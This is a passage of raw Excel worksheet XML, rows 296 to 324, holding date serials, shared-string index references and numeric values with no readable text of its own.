      <c r="W296" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="297" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A297" t="s">
        <v>4</v>
      </c>
      <c r="B297">
        <v>44390.480803206017</v>
      </c>
      <c r="C297" t="s">
        <v>2951</v>
      </c>
      <c r="D297">
        <v>101</v>
      </c>
      <c r="E297" t="s">
        <v>2956</v>
      </c>
      <c r="F297">
        <v>101</v>
      </c>
      <c r="G297" t="s">
        <v>2957</v>
      </c>
      <c r="H297" t="s">
        <v>2958</v>
      </c>
      <c r="I297" t="s">
        <v>268</v>
      </c>
      <c r="J297" t="s">
        <v>269</v>
      </c>
      <c r="K297" t="s">
        <v>10</v>
      </c>
      <c r="L297" t="s">
        <v>77</v>
      </c>
      <c r="M297" t="s">
        <v>270</v>
      </c>
      <c r="N297" t="s">
        <v>271</v>
      </c>
      <c r="Q297" t="s">
        <v>3600</v>
      </c>
      <c r="R297">
        <v>198450</v>
      </c>
      <c r="S297">
        <v>218783</v>
      </c>
      <c r="T297">
        <v>196134</v>
      </c>
      <c r="U297">
        <v>216702</v>
      </c>
      <c r="V297">
        <v>233026</v>
      </c>
      <c r="W297" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="298" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A298" t="s">
        <v>4</v>
      </c>
      <c r="B298">
        <v>44495.60851859954</v>
      </c>
      <c r="C298" t="s">
        <v>2598</v>
      </c>
      <c r="D298">
        <v>315</v>
      </c>
      <c r="E298" t="s">
        <v>2959</v>
      </c>
      <c r="F298">
        <v>103</v>
      </c>
      <c r="G298" t="s">
        <v>2960</v>
      </c>
      <c r="H298" t="s">
        <v>2961</v>
      </c>
      <c r="I298" t="s">
        <v>268</v>
      </c>
      <c r="J298" t="s">
        <v>269</v>
      </c>
      <c r="K298" t="s">
        <v>10</v>
      </c>
      <c r="L298" t="s">
        <v>77</v>
      </c>
      <c r="M298" t="s">
        <v>290</v>
      </c>
      <c r="N298" t="s">
        <v>291</v>
      </c>
      <c r="O298" t="s">
        <v>2962</v>
      </c>
      <c r="Q298" t="s">
        <v>3601</v>
      </c>
      <c r="R298">
        <v>40128175</v>
      </c>
      <c r="S298">
        <v>35134289</v>
      </c>
      <c r="T298">
        <v>38911106</v>
      </c>
      <c r="U298">
        <v>38660405</v>
      </c>
      <c r="V298">
        <v>44806196</v>
      </c>
      <c r="W298" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="299" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A299" t="s">
        <v>4</v>
      </c>
      <c r="B299">
        <v>44615.993121701387</v>
      </c>
      <c r="C299" t="s">
        <v>2598</v>
      </c>
      <c r="D299">
        <v>401</v>
      </c>
      <c r="E299" t="s">
        <v>2959</v>
      </c>
      <c r="F299">
        <v>201</v>
      </c>
      <c r="G299" t="s">
        <v>2960</v>
      </c>
      <c r="H299" t="s">
        <v>2961</v>
      </c>
      <c r="I299" t="s">
        <v>268</v>
      </c>
      <c r="J299" t="s">
        <v>269</v>
      </c>
      <c r="K299" t="s">
        <v>10</v>
      </c>
      <c r="L299" t="s">
        <v>77</v>
      </c>
      <c r="M299" t="s">
        <v>290</v>
      </c>
      <c r="N299" t="s">
        <v>291</v>
      </c>
      <c r="Q299" t="s">
        <v>3602</v>
      </c>
      <c r="R299">
        <v>40128175</v>
      </c>
      <c r="S299">
        <v>35134289</v>
      </c>
      <c r="T299">
        <v>38911106</v>
      </c>
      <c r="U299">
        <v>38660405</v>
      </c>
      <c r="V299">
        <v>44806196</v>
      </c>
      <c r="W299" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="300" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A300" t="s">
        <v>4</v>
      </c>
      <c r="B300">
        <v>44495.608518530091</v>
      </c>
      <c r="C300" t="s">
        <v>2598</v>
      </c>
      <c r="D300">
        <v>315</v>
      </c>
      <c r="E300" t="s">
        <v>2966</v>
      </c>
      <c r="F300">
        <v>311</v>
      </c>
      <c r="G300" t="s">
        <v>2967</v>
      </c>
      <c r="H300" t="s">
        <v>2968</v>
      </c>
      <c r="I300" t="s">
        <v>268</v>
      </c>
      <c r="J300" t="s">
        <v>269</v>
      </c>
      <c r="K300" t="s">
        <v>10</v>
      </c>
      <c r="L300" t="s">
        <v>77</v>
      </c>
      <c r="M300" t="s">
        <v>290</v>
      </c>
      <c r="N300" t="s">
        <v>291</v>
      </c>
      <c r="O300" t="s">
        <v>2969</v>
      </c>
      <c r="P300" t="s">
        <v>250</v>
      </c>
      <c r="Q300" t="s">
        <v>3601</v>
      </c>
      <c r="R300">
        <v>100867</v>
      </c>
      <c r="S300">
        <v>142294</v>
      </c>
      <c r="T300">
        <v>130189</v>
      </c>
      <c r="U300">
        <v>262576</v>
      </c>
      <c r="V300">
        <v>806818</v>
      </c>
      <c r="W300" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="301" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A301" t="s">
        <v>4</v>
      </c>
      <c r="B301">
        <v>44603.042708125002</v>
      </c>
      <c r="C301" t="s">
        <v>2598</v>
      </c>
      <c r="D301">
        <v>401</v>
      </c>
      <c r="E301" t="s">
        <v>2966</v>
      </c>
      <c r="F301">
        <v>401</v>
      </c>
      <c r="G301" t="s">
        <v>2967</v>
      </c>
      <c r="H301" t="s">
        <v>2968</v>
      </c>
      <c r="I301" t="s">
        <v>268</v>
      </c>
      <c r="J301" t="s">
        <v>269</v>
      </c>
      <c r="K301" t="s">
        <v>10</v>
      </c>
      <c r="L301" t="s">
        <v>77</v>
      </c>
      <c r="M301" t="s">
        <v>290</v>
      </c>
      <c r="N301" t="s">
        <v>291</v>
      </c>
      <c r="Q301" t="s">
        <v>3602</v>
      </c>
      <c r="R301">
        <v>100867</v>
      </c>
      <c r="S301">
        <v>142294</v>
      </c>
      <c r="T301">
        <v>130189</v>
      </c>
      <c r="U301">
        <v>262576</v>
      </c>
      <c r="V301">
        <v>806818</v>
      </c>
      <c r="W301" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="302" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A302" t="s">
        <v>4</v>
      </c>
      <c r="B302">
        <v>44495.608518553243</v>
      </c>
      <c r="C302" t="s">
        <v>2598</v>
      </c>
      <c r="D302">
        <v>315</v>
      </c>
      <c r="E302" t="s">
        <v>2970</v>
      </c>
      <c r="F302">
        <v>111</v>
      </c>
      <c r="G302" t="s">
        <v>2971</v>
      </c>
      <c r="H302" t="s">
        <v>2972</v>
      </c>
      <c r="I302" t="s">
        <v>268</v>
      </c>
      <c r="J302" t="s">
        <v>269</v>
      </c>
      <c r="K302" t="s">
        <v>10</v>
      </c>
      <c r="L302" t="s">
        <v>77</v>
      </c>
      <c r="M302" t="s">
        <v>290</v>
      </c>
      <c r="N302" t="s">
        <v>291</v>
      </c>
      <c r="O302" t="s">
        <v>2973</v>
      </c>
      <c r="Q302" t="s">
        <v>3601</v>
      </c>
      <c r="R302">
        <v>1777991</v>
      </c>
      <c r="S302">
        <v>1508679</v>
      </c>
      <c r="T302">
        <v>449661</v>
      </c>
      <c r="U302">
        <v>449064</v>
      </c>
      <c r="V302">
        <v>780572</v>
      </c>
      <c r="W302" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="303" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A303" t="s">
        <v>4</v>
      </c>
      <c r="B303">
        <v>44385.978538495372</v>
      </c>
      <c r="C303" t="s">
        <v>2598</v>
      </c>
      <c r="D303">
        <v>401</v>
      </c>
      <c r="E303" t="s">
        <v>2970</v>
      </c>
      <c r="F303">
        <v>201</v>
      </c>
      <c r="G303" t="s">
        <v>2971</v>
      </c>
      <c r="H303" t="s">
        <v>2972</v>
      </c>
      <c r="I303" t="s">
        <v>268</v>
      </c>
      <c r="J303" t="s">
        <v>269</v>
      </c>
      <c r="K303" t="s">
        <v>10</v>
      </c>
      <c r="L303" t="s">
        <v>77</v>
      </c>
      <c r="M303" t="s">
        <v>290</v>
      </c>
      <c r="N303" t="s">
        <v>291</v>
      </c>
      <c r="Q303" t="s">
        <v>3602</v>
      </c>
      <c r="R303">
        <v>1777991</v>
      </c>
      <c r="S303">
        <v>1508679</v>
      </c>
      <c r="T303">
        <v>449661</v>
      </c>
      <c r="U303">
        <v>449064</v>
      </c>
      <c r="V303">
        <v>780572</v>
      </c>
      <c r="W303" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="304" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A304" t="s">
        <v>4</v>
      </c>
      <c r="B304">
        <v>44340.620269027779</v>
      </c>
      <c r="C304" t="s">
        <v>2982</v>
      </c>
      <c r="D304">
        <v>100</v>
      </c>
      <c r="E304" t="s">
        <v>2983</v>
      </c>
      <c r="F304">
        <v>100</v>
      </c>
      <c r="G304" t="s">
        <v>2984</v>
      </c>
      <c r="H304" t="s">
        <v>2985</v>
      </c>
      <c r="I304" t="s">
        <v>268</v>
      </c>
      <c r="J304" t="s">
        <v>269</v>
      </c>
      <c r="K304" t="s">
        <v>10</v>
      </c>
      <c r="L304" t="s">
        <v>77</v>
      </c>
      <c r="M304" t="s">
        <v>270</v>
      </c>
      <c r="N304" t="s">
        <v>271</v>
      </c>
      <c r="Q304" t="s">
        <v>161</v>
      </c>
      <c r="W304" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="305" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A305" t="s">
        <v>4</v>
      </c>
      <c r="B305">
        <v>44340.620269004627</v>
      </c>
      <c r="C305" t="s">
        <v>2982</v>
      </c>
      <c r="D305">
        <v>100</v>
      </c>
      <c r="E305" t="s">
        <v>2986</v>
      </c>
      <c r="F305">
        <v>100</v>
      </c>
      <c r="G305" t="s">
        <v>2987</v>
      </c>
      <c r="H305" t="s">
        <v>2988</v>
      </c>
      <c r="I305" t="s">
        <v>268</v>
      </c>
      <c r="J305" t="s">
        <v>269</v>
      </c>
      <c r="K305" t="s">
        <v>10</v>
      </c>
      <c r="L305" t="s">
        <v>77</v>
      </c>
      <c r="M305" t="s">
        <v>270</v>
      </c>
      <c r="N305" t="s">
        <v>271</v>
      </c>
      <c r="Q305" t="s">
        <v>161</v>
      </c>
      <c r="W305" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="306" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A306" t="s">
        <v>4</v>
      </c>
      <c r="B306">
        <v>44474.417397951387</v>
      </c>
      <c r="C306" t="s">
        <v>2989</v>
      </c>
      <c r="D306">
        <v>100</v>
      </c>
      <c r="E306" t="s">
        <v>2990</v>
      </c>
      <c r="F306">
        <v>100</v>
      </c>
      <c r="G306" t="s">
        <v>2991</v>
      </c>
      <c r="H306" t="s">
        <v>2992</v>
      </c>
      <c r="I306" t="s">
        <v>268</v>
      </c>
      <c r="J306" t="s">
        <v>269</v>
      </c>
      <c r="K306" t="s">
        <v>10</v>
      </c>
      <c r="L306" t="s">
        <v>77</v>
      </c>
      <c r="M306" t="s">
        <v>270</v>
      </c>
      <c r="N306" t="s">
        <v>271</v>
      </c>
      <c r="Q306" t="s">
        <v>2993</v>
      </c>
      <c r="W306" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="307" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A307" t="s">
        <v>4</v>
      </c>
      <c r="B307">
        <v>44474.417397928242</v>
      </c>
      <c r="C307" t="s">
        <v>2989</v>
      </c>
      <c r="D307">
        <v>100</v>
      </c>
      <c r="E307" t="s">
        <v>2994</v>
      </c>
      <c r="F307">
        <v>100</v>
      </c>
      <c r="G307" t="s">
        <v>2995</v>
      </c>
      <c r="H307" t="s">
        <v>2996</v>
      </c>
      <c r="I307" t="s">
        <v>268</v>
      </c>
      <c r="J307" t="s">
        <v>269</v>
      </c>
      <c r="K307" t="s">
        <v>10</v>
      </c>
      <c r="L307" t="s">
        <v>77</v>
      </c>
      <c r="M307" t="s">
        <v>270</v>
      </c>
      <c r="N307" t="s">
        <v>271</v>
      </c>
      <c r="Q307" t="s">
        <v>2993</v>
      </c>
      <c r="W307" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="308" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A308" t="s">
        <v>4</v>
      </c>
      <c r="B308">
        <v>44474.412798113422</v>
      </c>
      <c r="C308" t="s">
        <v>2997</v>
      </c>
      <c r="D308">
        <v>100</v>
      </c>
      <c r="E308" t="s">
        <v>2998</v>
      </c>
      <c r="F308">
        <v>100</v>
      </c>
      <c r="G308" t="s">
        <v>2999</v>
      </c>
      <c r="H308" t="s">
        <v>3000</v>
      </c>
      <c r="I308" t="s">
        <v>268</v>
      </c>
      <c r="J308" t="s">
        <v>269</v>
      </c>
      <c r="K308" t="s">
        <v>10</v>
      </c>
      <c r="L308" t="s">
        <v>77</v>
      </c>
      <c r="M308" t="s">
        <v>270</v>
      </c>
      <c r="N308" t="s">
        <v>271</v>
      </c>
      <c r="Q308" t="s">
        <v>2993</v>
      </c>
      <c r="W308" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="309" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A309" t="s">
        <v>4</v>
      </c>
      <c r="B309">
        <v>44474.412798159719</v>
      </c>
      <c r="C309" t="s">
        <v>2997</v>
      </c>
      <c r="D309">
        <v>100</v>
      </c>
      <c r="E309" t="s">
        <v>3001</v>
      </c>
      <c r="F309">
        <v>100</v>
      </c>
      <c r="G309" t="s">
        <v>3002</v>
      </c>
      <c r="H309" t="s">
        <v>3003</v>
      </c>
      <c r="I309" t="s">
        <v>268</v>
      </c>
      <c r="J309" t="s">
        <v>269</v>
      </c>
      <c r="K309" t="s">
        <v>10</v>
      </c>
      <c r="L309" t="s">
        <v>77</v>
      </c>
      <c r="M309" t="s">
        <v>270</v>
      </c>
      <c r="N309" t="s">
        <v>271</v>
      </c>
      <c r="Q309" t="s">
        <v>2993</v>
      </c>
      <c r="W309" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="310" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A310" t="s">
        <v>4</v>
      </c>
      <c r="B310">
        <v>44649.621827025461</v>
      </c>
      <c r="C310" t="s">
        <v>3004</v>
      </c>
      <c r="D310">
        <v>100</v>
      </c>
      <c r="E310" t="s">
        <v>3005</v>
      </c>
      <c r="F310">
        <v>100</v>
      </c>
      <c r="G310" t="s">
        <v>3006</v>
      </c>
      <c r="H310" t="s">
        <v>3007</v>
      </c>
      <c r="I310" t="s">
        <v>268</v>
      </c>
      <c r="J310" t="s">
        <v>269</v>
      </c>
      <c r="K310" t="s">
        <v>10</v>
      </c>
      <c r="L310" t="s">
        <v>77</v>
      </c>
      <c r="M310" t="s">
        <v>270</v>
      </c>
      <c r="N310" t="s">
        <v>271</v>
      </c>
      <c r="Q310" t="s">
        <v>161</v>
      </c>
      <c r="W310" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="311" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A311" t="s">
        <v>4</v>
      </c>
      <c r="B311">
        <v>44721.899391134262</v>
      </c>
      <c r="C311" t="s">
        <v>3008</v>
      </c>
      <c r="D311">
        <v>100</v>
      </c>
      <c r="E311" t="s">
        <v>3009</v>
      </c>
      <c r="F311">
        <v>100</v>
      </c>
      <c r="G311" t="s">
        <v>3010</v>
      </c>
      <c r="H311" t="s">
        <v>3011</v>
      </c>
      <c r="I311" t="s">
        <v>268</v>
      </c>
      <c r="J311" t="s">
        <v>269</v>
      </c>
      <c r="K311" t="s">
        <v>10</v>
      </c>
      <c r="L311" t="s">
        <v>77</v>
      </c>
      <c r="M311" t="s">
        <v>270</v>
      </c>
      <c r="N311" t="s">
        <v>271</v>
      </c>
      <c r="Q311" t="s">
        <v>161</v>
      </c>
      <c r="W311" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="312" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A312" t="s">
        <v>4</v>
      </c>
      <c r="B312">
        <v>44671.611334131943</v>
      </c>
      <c r="C312" t="s">
        <v>3012</v>
      </c>
      <c r="D312">
        <v>101</v>
      </c>
      <c r="E312" t="s">
        <v>3013</v>
      </c>
      <c r="F312">
        <v>101</v>
      </c>
      <c r="G312" t="s">
        <v>3014</v>
      </c>
      <c r="H312" t="s">
        <v>3015</v>
      </c>
      <c r="I312" t="s">
        <v>268</v>
      </c>
      <c r="J312" t="s">
        <v>269</v>
      </c>
      <c r="K312" t="s">
        <v>10</v>
      </c>
      <c r="L312" t="s">
        <v>77</v>
      </c>
      <c r="M312" t="s">
        <v>290</v>
      </c>
      <c r="N312" t="s">
        <v>291</v>
      </c>
      <c r="Q312" t="s">
        <v>161</v>
      </c>
      <c r="W312" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="313" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A313" t="s">
        <v>4</v>
      </c>
      <c r="B313">
        <v>44475.653661631943</v>
      </c>
      <c r="C313" t="s">
        <v>3016</v>
      </c>
      <c r="D313">
        <v>110</v>
      </c>
      <c r="E313" t="s">
        <v>3017</v>
      </c>
      <c r="F313">
        <v>110</v>
      </c>
      <c r="G313" t="s">
        <v>3018</v>
      </c>
      <c r="H313" t="s">
        <v>3019</v>
      </c>
      <c r="I313" t="s">
        <v>268</v>
      </c>
      <c r="J313" t="s">
        <v>269</v>
      </c>
      <c r="K313" t="s">
        <v>10</v>
      </c>
      <c r="L313" t="s">
        <v>77</v>
      </c>
      <c r="M313" t="s">
        <v>1766</v>
      </c>
      <c r="N313" t="s">
        <v>1767</v>
      </c>
      <c r="Q313" t="s">
        <v>1325</v>
      </c>
      <c r="U313">
        <v>4</v>
      </c>
      <c r="V313">
        <v>10</v>
      </c>
      <c r="W313" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="314" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A314" t="s">
        <v>4</v>
      </c>
      <c r="B314">
        <v>44684.642173368055</v>
      </c>
      <c r="C314" t="s">
        <v>3020</v>
      </c>
      <c r="D314">
        <v>101</v>
      </c>
      <c r="E314" t="s">
        <v>3021</v>
      </c>
      <c r="F314">
        <v>101</v>
      </c>
      <c r="G314" t="s">
        <v>3022</v>
      </c>
      <c r="H314" t="s">
        <v>3023</v>
      </c>
      <c r="I314" t="s">
        <v>268</v>
      </c>
      <c r="J314" t="s">
        <v>269</v>
      </c>
      <c r="K314" t="s">
        <v>10</v>
      </c>
      <c r="L314" t="s">
        <v>77</v>
      </c>
      <c r="M314" t="s">
        <v>290</v>
      </c>
      <c r="N314" t="s">
        <v>291</v>
      </c>
      <c r="Q314" t="s">
        <v>3024</v>
      </c>
      <c r="W314" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="315" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A315" t="s">
        <v>4</v>
      </c>
      <c r="B315">
        <v>44645.746241168985</v>
      </c>
      <c r="C315" t="s">
        <v>3025</v>
      </c>
      <c r="D315">
        <v>100</v>
      </c>
      <c r="E315" t="s">
        <v>3026</v>
      </c>
      <c r="F315">
        <v>100</v>
      </c>
      <c r="G315" t="s">
        <v>3027</v>
      </c>
      <c r="H315" t="s">
        <v>3028</v>
      </c>
      <c r="I315" t="s">
        <v>268</v>
      </c>
      <c r="J315" t="s">
        <v>269</v>
      </c>
      <c r="K315" t="s">
        <v>10</v>
      </c>
      <c r="L315" t="s">
        <v>77</v>
      </c>
      <c r="M315" t="s">
        <v>290</v>
      </c>
      <c r="N315" t="s">
        <v>291</v>
      </c>
      <c r="Q315" t="s">
        <v>3603</v>
      </c>
      <c r="S315">
        <v>17</v>
      </c>
      <c r="U315">
        <v>7</v>
      </c>
      <c r="V315">
        <v>1</v>
      </c>
      <c r="W315" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="316" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A316" t="s">
        <v>4</v>
      </c>
      <c r="B316">
        <v>44769.862446990737</v>
      </c>
      <c r="C316" t="s">
        <v>3025</v>
      </c>
      <c r="D316">
        <v>200</v>
      </c>
      <c r="E316" t="s">
        <v>3026</v>
      </c>
      <c r="F316">
        <v>200</v>
      </c>
      <c r="G316" t="s">
        <v>3027</v>
      </c>
      <c r="H316" t="s">
        <v>3028</v>
      </c>
      <c r="I316" t="s">
        <v>268</v>
      </c>
      <c r="J316" t="s">
        <v>269</v>
      </c>
      <c r="K316" t="s">
        <v>10</v>
      </c>
      <c r="L316" t="s">
        <v>77</v>
      </c>
      <c r="M316" t="s">
        <v>290</v>
      </c>
      <c r="N316" t="s">
        <v>291</v>
      </c>
      <c r="Q316" t="s">
        <v>3030</v>
      </c>
      <c r="V316">
        <v>1</v>
      </c>
      <c r="W316" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="317" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A317" t="s">
        <v>4</v>
      </c>
      <c r="B317">
        <v>44294.653877083336</v>
      </c>
      <c r="C317" t="s">
        <v>3031</v>
      </c>
      <c r="D317">
        <v>112</v>
      </c>
      <c r="E317" t="s">
        <v>3032</v>
      </c>
      <c r="F317">
        <v>102</v>
      </c>
      <c r="G317" t="s">
        <v>3033</v>
      </c>
      <c r="H317" t="s">
        <v>3034</v>
      </c>
      <c r="I317" t="s">
        <v>268</v>
      </c>
      <c r="J317" t="s">
        <v>269</v>
      </c>
      <c r="K317" t="s">
        <v>10</v>
      </c>
      <c r="L317" t="s">
        <v>77</v>
      </c>
      <c r="M317" t="s">
        <v>270</v>
      </c>
      <c r="N317" t="s">
        <v>271</v>
      </c>
      <c r="Q317" t="s">
        <v>3604</v>
      </c>
      <c r="R317">
        <v>28</v>
      </c>
      <c r="S317">
        <v>6</v>
      </c>
      <c r="T317">
        <v>12</v>
      </c>
      <c r="U317">
        <v>26</v>
      </c>
      <c r="V317">
        <v>1738</v>
      </c>
      <c r="W317" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="318" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A318" t="s">
        <v>4</v>
      </c>
      <c r="B318">
        <v>44522.390718946757</v>
      </c>
      <c r="C318" t="s">
        <v>3031</v>
      </c>
      <c r="D318">
        <v>112</v>
      </c>
      <c r="E318" t="s">
        <v>3036</v>
      </c>
      <c r="F318">
        <v>112</v>
      </c>
      <c r="G318" t="s">
        <v>3037</v>
      </c>
      <c r="H318" t="s">
        <v>3038</v>
      </c>
      <c r="I318" t="s">
        <v>268</v>
      </c>
      <c r="J318" t="s">
        <v>269</v>
      </c>
      <c r="K318" t="s">
        <v>10</v>
      </c>
      <c r="L318" t="s">
        <v>77</v>
      </c>
      <c r="M318" t="s">
        <v>270</v>
      </c>
      <c r="N318" t="s">
        <v>271</v>
      </c>
      <c r="Q318" t="s">
        <v>3604</v>
      </c>
      <c r="V318">
        <v>153</v>
      </c>
      <c r="W318" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="319" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A319" t="s">
        <v>4</v>
      </c>
      <c r="B319">
        <v>44294.653877118057</v>
      </c>
      <c r="C319" t="s">
        <v>3031</v>
      </c>
      <c r="D319">
        <v>112</v>
      </c>
      <c r="E319" t="s">
        <v>3039</v>
      </c>
      <c r="F319">
        <v>102</v>
      </c>
      <c r="G319" t="s">
        <v>3040</v>
      </c>
      <c r="H319" t="s">
        <v>3041</v>
      </c>
      <c r="I319" t="s">
        <v>268</v>
      </c>
      <c r="J319" t="s">
        <v>269</v>
      </c>
      <c r="K319" t="s">
        <v>10</v>
      </c>
      <c r="L319" t="s">
        <v>77</v>
      </c>
      <c r="M319" t="s">
        <v>270</v>
      </c>
      <c r="N319" t="s">
        <v>271</v>
      </c>
      <c r="Q319" t="s">
        <v>3604</v>
      </c>
      <c r="W319" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="320" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A320" t="s">
        <v>4</v>
      </c>
      <c r="B320">
        <v>44342.385217916664</v>
      </c>
      <c r="C320" t="s">
        <v>3042</v>
      </c>
      <c r="D320">
        <v>205</v>
      </c>
      <c r="E320" t="s">
        <v>3043</v>
      </c>
      <c r="F320">
        <v>204</v>
      </c>
      <c r="G320" t="s">
        <v>3044</v>
      </c>
      <c r="H320" t="s">
        <v>3045</v>
      </c>
      <c r="I320" t="s">
        <v>611</v>
      </c>
      <c r="J320" t="s">
        <v>612</v>
      </c>
      <c r="K320" t="s">
        <v>14</v>
      </c>
      <c r="L320" t="s">
        <v>77</v>
      </c>
      <c r="M320" t="s">
        <v>612</v>
      </c>
      <c r="N320" t="s">
        <v>1098</v>
      </c>
      <c r="O320" t="s">
        <v>1377</v>
      </c>
      <c r="P320" t="s">
        <v>612</v>
      </c>
      <c r="Q320" t="s">
        <v>3605</v>
      </c>
      <c r="R320">
        <v>319853</v>
      </c>
      <c r="S320">
        <v>1060325</v>
      </c>
      <c r="T320">
        <v>690881</v>
      </c>
      <c r="U320">
        <v>1431176</v>
      </c>
      <c r="V320">
        <v>1574453</v>
      </c>
      <c r="W320" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="321" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A321" t="s">
        <v>4</v>
      </c>
      <c r="B321">
        <v>44342.385217916664</v>
      </c>
      <c r="C321" t="s">
        <v>3042</v>
      </c>
      <c r="D321">
        <v>300</v>
      </c>
      <c r="E321" t="s">
        <v>3043</v>
      </c>
      <c r="F321">
        <v>300</v>
      </c>
      <c r="G321" t="s">
        <v>3044</v>
      </c>
      <c r="H321" t="s">
        <v>3045</v>
      </c>
      <c r="I321" t="s">
        <v>611</v>
      </c>
      <c r="J321" t="s">
        <v>612</v>
      </c>
      <c r="K321" t="s">
        <v>14</v>
      </c>
      <c r="L321" t="s">
        <v>77</v>
      </c>
      <c r="M321" t="s">
        <v>612</v>
      </c>
      <c r="N321" t="s">
        <v>1098</v>
      </c>
      <c r="O321" t="s">
        <v>1377</v>
      </c>
      <c r="P321" t="s">
        <v>612</v>
      </c>
      <c r="Q321" t="s">
        <v>3606</v>
      </c>
      <c r="R321">
        <v>319853</v>
      </c>
      <c r="S321">
        <v>1060325</v>
      </c>
      <c r="T321">
        <v>690881</v>
      </c>
      <c r="U321">
        <v>1431176</v>
      </c>
      <c r="V321">
        <v>1574453</v>
      </c>
      <c r="W321" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="322" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A322" t="s">
        <v>4</v>
      </c>
      <c r="B322">
        <v>44494.699802650466</v>
      </c>
      <c r="C322" t="s">
        <v>3048</v>
      </c>
      <c r="D322">
        <v>100</v>
      </c>
      <c r="E322" t="s">
        <v>3049</v>
      </c>
      <c r="F322">
        <v>100</v>
      </c>
      <c r="G322" t="s">
        <v>3050</v>
      </c>
      <c r="H322" t="s">
        <v>1360</v>
      </c>
      <c r="I322" t="s">
        <v>268</v>
      </c>
      <c r="J322" t="s">
        <v>269</v>
      </c>
      <c r="K322" t="s">
        <v>10</v>
      </c>
      <c r="L322" t="s">
        <v>77</v>
      </c>
      <c r="M322" t="s">
        <v>290</v>
      </c>
      <c r="N322" t="s">
        <v>291</v>
      </c>
      <c r="Q322" t="s">
        <v>3607</v>
      </c>
      <c r="T322">
        <v>2</v>
      </c>
      <c r="U322">
        <v>753</v>
      </c>
      <c r="V322">
        <v>2127812</v>
      </c>
      <c r="W322" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="323" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A323" t="s">
        <v>4</v>
      </c>
      <c r="B323">
        <v>44079.513581053237</v>
      </c>
      <c r="C323" t="s">
        <v>3052</v>
      </c>
      <c r="D323">
        <v>110</v>
      </c>
      <c r="E323" t="s">
        <v>3053</v>
      </c>
      <c r="F323">
        <v>110</v>
      </c>
      <c r="G323" t="s">
        <v>3054</v>
      </c>
      <c r="H323" t="s">
        <v>3045</v>
      </c>
      <c r="I323" t="s">
        <v>611</v>
      </c>
      <c r="J323" t="s">
        <v>612</v>
      </c>
      <c r="K323" t="s">
        <v>14</v>
      </c>
      <c r="L323" t="s">
        <v>77</v>
      </c>
      <c r="M323" t="s">
        <v>612</v>
      </c>
      <c r="N323" t="s">
        <v>1098</v>
      </c>
      <c r="O323" t="s">
        <v>1356</v>
      </c>
      <c r="Q323" t="s">
        <v>3608</v>
      </c>
      <c r="T323">
        <v>63</v>
      </c>
      <c r="U323">
        <v>309</v>
      </c>
      <c r="V323">
        <v>352</v>
      </c>
      <c r="W323" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="324" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A324" t="s">
        <v>4</v>
      </c>
      <c r="B324">
        <v>44079.513581053237</v>
      </c>
      <c r="C324" t="s">
        <v>3052</v>
      </c>
      <c r="D324">
        <v>200</v>
      </c>
      <c r="E324" t="s">
        <v>3053</v>
      </c>
      <c r="F324">
        <v>200</v>
      </c>
      <c r="G324" t="s">
        <v>3054</v>
      </c>
      <c r="H324" t="s">
        <v>3045</v>
      </c>
      <c r="I324" t="s">
        <v>611</v>
      </c>
      <c r="J324" t="s">
        <v>612</v>
      </c>
      <c r="K324" t="s">
        <v>14</v>
      </c>
      <c r="L324" t="s">
        <v>77</v>
      </c>
      <c r="M324" t="s">
        <v>612</v>
      </c>
      <c r="N324" t="s">
        <v>1098</v>
      </c>
      <c r="O324" t="s">
        <v>1356</v>
      </c>
      <c r="Q324" t="s">
        <v>3609</v>
      </c>
      <c r="T324">
        <v>63</v>
      </c>
      <c r="U324">
        <v>309</v>
      </c>
      <c r="V324">
        <v>352</v>
      </c>
      <c r="W324" t="s">
        <v>95</v>
      </c>
    </row>
